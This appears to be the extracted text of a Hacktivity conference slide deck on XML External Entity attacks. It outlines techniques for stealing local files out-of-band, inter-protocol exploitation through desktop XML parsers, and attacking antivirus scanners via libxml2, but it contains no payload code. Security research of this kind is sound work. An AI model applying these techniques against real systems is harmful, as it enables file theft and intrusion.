2. Possible Hacktivity topics
How secure are today’s games?
Possible vulns in the EventLog subsystem of recent
Windows systems.
The security of smart houses.
3.
4. Well known XML attacks
XSLT-related
XInclude attacks
Entity-based attacks
• Billion laughs
• XXE
Everybody should read “XML Schema, DTD, and
Entity Attacks” by VSR
5. Lots of XML-related web application attacks.
But the web is not the whole world. (not yet, anyway :) )
Won’t show any new XML vulnerabilities.
DON’Ts
6. DOs
Show exciting ways to exploit
Deal with the client side
Deal with XML-derivatives, and files with
embedded XML parts
There are tons of these.
Often people don’t even realize they are dealing
with XML
Some examples: X3D, CML, BeerXML, GPX,
OpenDocument, EPUB, you name it.
7. XML entities
What are “entities” in XML-world?
OK, what are “external entities”?
http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
8. XXE Intro
Most basic XXE: include resources
App has to display something from the XML
12. Special type of entity
Using % instead of &
More flexible
Declaration of external DTD
Can not be used in XML body
XML syntax is not a must
DTD conformity
Parameter entities
16. Sending local file content
External parameter entity
Different protocol handlers
FTP, HTTP, FILE
Differences in implementation
Out-of-Bounds
17.
18.
19.
20.
21. XXE meets inter-protocol exploitation
Requirements
Encapsulation
Error tolerance
Main difficulty: limited character set
Let’s check some XML parsers’ badchars
Internet Explorer
• only ASCII
• URL-encodes some char (e.g. space -> %20)
• Cuts newlines
Visual Studio
• URL-encodes every non alphanumeric chars
37. Garmin Training Center
+ Not bothering with n
- Yet not able to evaluate &variables;
Possible implementation issue
Visual Studio 2012
+ Ability to evaluate &variables;
- A great fan of URL encoding
Permanent fail?
38. Slight possibility of using Garmin
I believe I saw it working
Finding another n application
Visual Studio can be „controlled”
Sending multiple files
Delivering more attacks
Not at all
39. XXE the AV!
Original idea: .docx vs. virus scanners
Grepped ClamAV’s source for “xml”
It uses libxml2 to open XAR archives
basically an archive format with compressed XML
metadata
What other AV’s know this format?
49. &Some haxx0r stuff;
libxml2 limitation: very strict URI checking
for example, no newlines allowed
OOB attacks are very-very limited
only files without newlines can be stolen.
SSRF is our Super Mushroom
only GET request
only HTTP
payload cannot contain non-ASCII chars
58. Further research
Games that use XML for game saves, network communication
• Skyrim
• Flight Gear
XML metadata
• rdf
Binary XML parsers
• Cwxml
• OpenEXI
• Exifficient
• AgileDelta
• Window EventLog format (since Vista)
Network Configuration Protocol (NETCONF)
XML databases
• IBM DB2
• Oracle
• MSSQL